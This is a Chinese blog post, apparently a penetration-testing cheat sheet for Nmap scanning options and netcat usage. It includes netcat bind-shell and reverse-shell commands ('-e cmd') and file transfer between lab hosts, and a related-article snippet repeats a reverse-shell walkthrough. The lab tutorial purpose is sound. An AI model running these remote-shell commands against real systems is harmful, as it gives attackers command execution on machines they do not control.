Nmap&NC食用技巧

已于 2023-12-16 14:59:12 修改
阅读量75 收藏
点赞数 1
分类专栏: 内网渗透 文章标签: 安全 网络
于 2023-08-16 10:09:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wh00000001/article/details/132298743
版权

Nmap常见参数

参数作用常用场景
-sn只探测存活主机,不进行端口扫描,适用于快速存活主机发现。发现网络中存活的主机。
-Pn(推荐)只探测端口,不考虑主机是否存活,适用于绕过防火墙的探测。绕过防火墙,直接进行端口扫描。
-O进行操作系统探测,尝试猜测目标主机的操作系统类型。获取目标主机的操作系统信息。
-sS(推荐)TCP SYN 扫描,对指定端口进行 SYN 扫描,常用于隐蔽性扫描。隐蔽性扫描,不完全连接目标主机。
-p指定扫描的端口范围,如单个端口、端口列表或范围。所有端口:80,8080   -p-    80-8080对指定端口或一段端口范围进行扫描。
-sV探测服务版本,获取目标主机的开放端口的服务版本信息。获取开放端口的服务及其版本。
-A综合扫描,包括存活主机、操作系统、服务版本等信息。获得目标主机的综合信息,用于全面的渗透测试。
-iL指定文件中的 IP 地址列表作为扫描目标。批量扫描多个目标主机。
--exclude排除指定的 IP 地址,不对其进行扫描。避免扫描指定的 IP 地址。
--excludefile指定文件中的 IP 地址列表,排除列表中的主机。批量排除多个主机,专注于其他目标。
--script=vuln运行漏洞扫描脚本,探测目标主机的常见漏洞。发现目标主机的漏洞并进行评估。
-T4设置扫描速度为中等,可根据网络条件调整。在速度和准确性之间取得平衡。
-v显示详细输出信息,包括每个扫描步骤的状态和结果。获取更详细的扫描信息。
-oN将扫描结果保存到指定文件中,格式为正常文本。保存扫描结果以供后续分析。
-oX将扫描结果保存到指定文件中,格式为 XML。保存扫描结果以供进一步处理。
-oG将扫描结果保存到指定文件中,格式为 grepable。保存扫描结果,用于 grep 命令过滤。
--reason显示扫描结果中每个端口状态的原因。理解扫描结果中端口状态的来源。
--top-ports指定进行扫描的前 N 个最常见端口。针对常见端口进行快速扫描。

 扫描例子:nmap -p- -A -sS 192.168.11.100   

常见端口 

端口号端口说明
21ftp
22ssh
23telnet
80http
443https
139samba
3306mysql
3389RDP远程桌面

 NC食用常见参数

参数作用
-l监听模式,用于在服务器端侦听连接
-p <port>指定端口号
-s <source>指定源 IP 地址
-v显示详细输出信息
-z扫描监听主机上的端口,但不发送数据
-u使用 UDP 协议
-e <command>执行命令
-k持续监听模式,使服务器保持在后台运行
-q <seconds>设置超时时间
-n不进行 DNS 解析
-w <timeout>设置连接超时时间
-c使用无连接模式
-i立即连接模式
-o <file>指定输出文件

 kali 输入ip:建立正向连接

kali:nc 192.168.11.100 4444

win7:nc64.exe -lvvp 4444 -e cmd

_________________________________________________________________________
目标主机输入ip:建立反向连接

kali: nc -lvvp 4444 
win7: nc 192.168.11.101 4444 - e cmd

 kali往目标主机传文件

kali主机:nc -lvvp 4444 < ip.txt -q 1

目标主机:nc64.exe 192.168.11.101 4444>111.txt

紈子
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nc端口监听工具瑞士军刀
03-11
什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速                                                                                                                                                                                                                         nc的控制参数不少,常用的几个参数如下所列: 1) -l 用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。 2) -p 暂未用到(老版本的nc可能需要在端口号前加-p参数,下面测试环境是centos6.6,nc版本是nc-1.84,未用到-p参数) 3) -s  指定发送数据的源IP地址,适用于多网卡机  4) -u  指定nc使用UDP协议,默认为TCP 5) -v 输出交互或出错信息,新手调试时尤为有用 6)-w 超时秒数,后面跟数字  7)-z 表示zero,表示扫描时不发送任何数据       前期准备 准备两台机器,用于测试nc命令的用法 主机A:ip地址 10.0.1.161 主机B:ip地址 10.0.1.162   两台机器先安装ncnmap的包 yum install nc -y yum install nmap -y 如果提示如下-bash: nc: command not found 表示没安装nc的包 ———————————————— 版权声明:本文为CSDN博主「小毛毛2013」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/u012486730/article/details/82019996
在Linux上测试网络的命令之一(ping\telnet\nmap\nc)
qq_42779175的博客
12-27 8824
常用的网络命令 一、ping 命令 通常用来测试双方网络是否相通网络是否启动或者测试自己能否联网,当然如果对方机器禁止ICMP协议ping他的话,也是ping不通的,但是对方的机子也许是开着的。 常见命令参数 -q 不显示任何传送封包的信息,只显示最后的结果 -n 只输出数值 -R 记录路由过程 -c count 总次数 -i 时间间隔 -t 存活数值:设置存活数值TTL的大小 ping自己的机器...
何使用 NMAP 命令进行网络扫描(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
05-18 1513
如何使用 NMAP 命令进行网络扫描Nmap(“Network Mapper”)是一个免费的开源(许可)实用程序,用于网络发现和安全审计。许多系统和网络管理员还发现它对网络清单、管理服务升级计划以及监控主机或服务正常运行时间等任务很有用。Nmap 以新颖的方式使用原始 IP 数据包来确定网络上可用的主机、这些主机提供的服务(应用程序名称和版本)、它们运行的操作系统(和操作系统版本)、数据包过滤器/防火墙的类型正在使用,以及许多其他特性。它旨在快速扫描大型网络,但对单个主机也能正常工作。
网络扫描工具nc&nmap
Linuxer's Blog Data
07-22 6288
一、NC 1、nc安装 # yum install nc 2、nc详解 linux nc命令   功能说明:功能强大的网络工具 语  法:nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...] 参  数:   -g   设置路由器跃程通信网关,最丢哦可设置8个。   -G   设置来源路由指向器,其数
网络管理工具nmapnc安装使用
weixin_43824520的博客
07-02 677
nmap即(Network Mapper),是linux系统中一个常用的网络管理工具,可以扫描端口、嗅探主机所在的网络环境,以及判断网络中主机的操作系统等。 实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 nmap yum install -y nmap #查看主机当前开放的端口 nmap localhost #查看主机端口(1024-65535)中开放的端口 nmap -p 1024-65535 localhost #探测目标主机开放的端口 .
nmapnc扫描工具
diexingtao9618的博客
09-18 1110
nmapnc扫描工具 1 使用nmapnc探测服务器信息-使用curl 查看web服务器类型 2 在centos6系统下进行提权 3 实战-通过tcpdump抓包解决服务器被黑上不了网的问题 .1.1 安装nmap命令 1、nmap概述:nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。...
防ping,我们可以使用telnet,ncnmap 命令来实现
一天不写代码难受的博客
05-20 1016
在这个示例中,我们使用 telnet 命令测试 SERVER1 到 SERVER2 和 SERVER2 到 SERVER1 的连接。在这个示例中,我们使用 nmap 命令测试 SERVER1 到 SERVER2 和 SERVER2 到 SERVER1 的连接。nmap 命令是一个网络扫描工具,可以用于扫描网络上的主机和端口,也可以用于测试两个服务器之间的网络连接。在这个示例中,我们使用 nc 命令测试 SERVER1 到 SERVER2 和 SERVER2 到 SERVER1 的连接。
kali渗透之利用nmapnc进行扫描
m0_56988395的博客
02-18 768
基于Nmap的扫描方式 nmap -sn 192.168.60.0/24 (-sn 表示只进行PING扫描) nmap扫描类型主要有tcp的全连接扫描(会在被扫描机器留下记录),半连接扫描(不会留下记录) nmap -sS(半连接) 192.168.60.77 -p 80,81,21,25,22,110,443(端口) 三,使用NC(netcat)扫描端口 作用 1,实现TCP/UDP端口解析,nc可以作为server以TCP或UDP方式监听指定端口 2,端口的扫描,nc可以.
Nmap使用技巧总结-
04-01
本文将详细介绍NMap的一些常用命令和技巧,帮助用户快速掌握其使用方法。 **一、主机发现** 主机发现是NMap的一项基本功能,它允许用户找出网络中的活跃设备。以下是一些常用的扫描类型: 1. **全面扫描/综合扫描...
Vulnscan:Nmap&Vulners提供了一些代码,因此您不必弄乱命令行-并不是说这有什么问题。
02-17
Cyber​​ IQ Vulnscan使用Nmap和Vulners扫描外部目标或内部网络中的漏洞。 通过提示您输入Nmap在其命令行参数中使用的值,它使过程变得更简单。 它将指导您选择目标,端口和扫描速度。 它是Python和Bash脚本的组合...
Nmap源代码
07-17
通过深入研究Nmap的源代码,不仅可以提升你的编程技巧,还可以增进对网络安全网络协议的理解。这是一项值得投入时间和精力的学习项目,尤其是在当前网络安全日益重要的背景下,掌握Nmap的工作原理将有助于你成为一...
nmap-services
09-06
nmap扫描的常用的端口,端口对应的常见服务。 tcpmux 1/tcp 0.001995 # TCP Port Service Multiplexer [rfc-1078] | TCP Port Service Multiplexer tcpmux 1/udp 0.001236 # TCP Port Service Multiplexer ...
nmap 免安装版,解压直接使用
01-12
**Nmap网络扫描工具详解** Nmap,全称“Network Mapper”,是一款强大的网络扫描工具,主要用于探测网络上的主机和服务,以确定网络拓扑、安全漏洞和系统信息。这款工具因其高效、灵活和多功能性而备受信息安全...
nmap配合nc拿到cmd权限
qq_53947780的博客
07-31 221
第一步:在内网进行nmap扫描 nmap -sn [扫描内网网段] (直接跳过主机发现) 第二步:确定目标:nmap -sS 【目标IP】 第三步:黑客用nc.exe监听自己端口4444:nc -lp 4444 第四步:服务端主动连接黑客:nc -nv 【黑客IP】 4444 -e cmd (如果是linux为-c bash) 控制cmd后进行信息收集: whoami 查看自己身份 whoami /all 获取当前域的信息 ipconfig /all 查看详细ip...
一些常用linux网络工具的经验共享--Tcpdump,Nmap,Netstat,nc
浮白
03-07 5396
<br />Tcpdump-转储网络上的数据流<br /><br /> Tcpdump能够截获当前所有通过本机网卡的数据包。它拥有灵活的过滤机制,可以确保得到想要的数据。由于Tcpdump 只能收集通过本机的数据,因此它的应用受到了一些限制,大多应用在网关或服务器自我检测上。例如,在作为网关的主机上,想知道本地网络中IP 地址为192.168.0.5 的主机现在与外界通信的情况,就可以使用如下命令:<br /><br /> tcpdump -i eth0 src host 192.168.0.5<
Nmap命令:-sP和-sN的区别
学信安技术 卫国家之门
09-19 9321
Nmap命令:-sP和-sN的区别 -sP:Ping扫描 Ping扫描:只进行Ping,然后显现出在线(做出响应)的主机,使用该选项扫描可以轻易地获取目标信息而不会被轻易发现。 在默认情况下,Nmap会发送一个ICMP回声请求和一个TCP报文到目标端口。 Ping扫描的优点:不会返回太多的信息造成对结果的分析,并且这是一种非常高效的扫描方式。 -sN:隐蔽扫描(-sF、-sX) -sN是Null扫描,是通过发送非常规的TCP通信数据包对计算机进行探测。 很多情况下Null扫描与Xmas扫描恰好相反,
Nmap常用命令总结
热门推荐
OKAY_TC的博客
11-21 4万+
1. nmap -sT 192.168.96.4 //TCP连接扫描,不安全,慢 2. nmap -sS 192.168.96.4 //SYN扫描,使用最频繁,安全,快 3. nmap -Pn 192.168.96.4 //目标机禁用ping,绕过ping扫描 4. nmap -sU 192.168.96.4 //UDP扫描,慢,可得到有价值的服务器程序 5. nmap -sI 僵...
nmap常用扫描命令
赴前尘
06-21 1476
nmap常用扫描命令
如何使用 NMAP 命令进行网络扫描
qq_44430237的博客
03-15 1万+
Nmap(“Network Mapper”)是一个免费的开源(许可)实用程序,用于网络发现和安全审计。许多系统和网络管理员还发现它对网络清单、管理服务升级计划以及监控主机或服务正常运行时间等任务很有用。Nmap 以新颖的方式使用原始 IP 数据包来确定网络上可用的主机、这些主机提供的服务(应用程序名称和版本)、它们运行的操作系统(和操作系统版本)、数据包过滤器/防火墙的类型正在使用,以及许多其他特性。它旨在快速扫描大型网络,但对单个主机也能正常工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值